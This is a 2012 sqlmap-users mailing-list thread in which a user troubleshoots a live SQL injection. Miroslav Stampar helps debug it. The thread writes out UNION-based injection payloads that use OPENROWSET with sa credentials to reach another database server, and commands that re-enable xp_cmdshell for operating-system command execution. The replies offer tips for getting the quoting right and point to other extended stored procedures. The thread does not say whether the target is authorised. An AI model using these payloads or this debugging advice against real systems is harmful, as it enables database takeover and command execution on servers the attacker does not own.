Re: [sqlmap-users] error with ms sql

Thu, 21 Jun 2012 05:19:43 -0700 

Hi Adi.

I think that that is really the proper way how to "escape" the single quote
in MsSQL (
http://stackoverflow.com/questions/1586560/how-do-i-escape-a-single-quote-in-sqlserver)
and you can't use any CHAR() escaping directly inside the OPENROWSET (there
are some ways how to do it via EXEC
http://social.msdn.microsoft.com/forums/en-US/transactsql/thread/0f78e033-53a4-4404-a190-9e3b269874ec<-
you can use there a CHAR() escaping, but I really do believe that this
is unnecessary in your case).

So, I would suggest you to continue playing around a bit (e.g. with other
extended stored procedures (
http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm) to see if the
problem persists).

Kind regards,
Miroslav Stampar

On Thu, Jun 21, 2012 at 1:12 PM, Adi Mutu <adi_mut...@yahoo.com> wrote:

> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12',  (
> select * from
> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','
>  select @@version;  master..sp_configure ''xp_cmdshell'',1
>  ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
>
> the problem is with the query:
>
> select @@version;  master..sp_configure ''xp_cmdshell'',1
> Any possibility to give the string from ascii codes as in mysql?
>
>   ------------------------------
> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *To:* Adi Mutu <adi_mut...@yahoo.com>
> *Cc:* "sqlmap-users@lists.sourceforge.net" <
> sqlmap-users@lists.sourceforge.net>
> *Sent:* Thursday, June 21, 2012 2:01 PM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> It all depends on context. You'll need to send a sample that you want to
> run. Quotes are not interpreted/parsed everywhere the same.
>
> Kind regards
>
> On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
> my feeling is that
> "[OLE/DB provider returned message: Deferred prepare could not be
> completed." is because of an sql error:) so my fault.
>
> and regarding the second error, I think you must always return some
> columns in the query , such as select @@version.
>
> now question is how do i embed a string inside another string delimited
> with quotes? Looks like double quotes is not working.....doubling quote ''
> looks like not working always....
>
>   ------------------------------
> *From:* Adi Mutu <adi_mut...@yahoo.com>
> *To:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *Cc:* "sqlmap-users@lists.sourceforge.net" <
> sqlmap-users@lists.sourceforge.net>
> *Sent:* Thursday, June 21, 2012 11:45 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> tried, same stuff.
> I've tried to reenable xp_cmdshell first with
>
> master..sp_configure 'show advanced options',1
> reconfigure
> master..sp_configure 'xp_cmdshell',1
> reconfigure
>
> and got the same error: [OLE/DB provider returned message: Deferred
> prepare could not be completed.]
>
> then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
> and got error:
>
> OLE DB error trace [Non-interface error: OLE DB provider unable to process
> object, since the object has no columnsProviderName='SQLOLEDB', Query=exec
> sp_addextendedproc "xp_cmdshell","xp_log70.dll" '].
>
>
>   ------------------------------
> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *To:* Adi Mutu <adi_mut...@yahoo.com>
> *Cc:* "sqlmap-users@lists.sourceforge.net" <
> sqlmap-users@lists.sourceforge.net>
> *Sent:* Thursday, June 21, 2012 11:26 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> try with master..resultabcd
>
> i forgot to mention that there needs to be two dots (or schema name in
> between) between db name and table name in mssql
>
> On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
> Hi Miroslav,
>
> got db_name  master and tried with master.resultabcd but i get the same
> error.
>
> Kind Regards,
> A.
>
>    ------------------------------
> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
> *To:* Adi Mutu <adi_mut...@yahoo.com>
> *Cc:* "sqlmap-users@lists.sourceforge.net" <
> sqlmap-users@lists.sourceforge.net>
> *Sent:* Thursday, June 21, 2012 11:11 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> Hi Adi.
>
> You could try prepending the database name to the resultbcd. It seems that
> in case of linked server(s) doing that fixes the mentioned problem
> (Reference:
> http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466
> )
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
> I'm having an injection like this:
> openrowset in a union (I've managed to do a SELECT @@version on
> 192.168.1.4)
>
> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12',  (
> select * from
> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select
> output from resultbcd')),'aaa','15','16','17','18','19','20','21' from
> teachers7 where id=808
>
> and when I try to select form resultabcd i get:
> [OLE/DB provider returned message: Deferred prepare could not be
> completed.]
>
> could not find a good answer with google. Thanks.
>
> Kind regards,
> A.
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to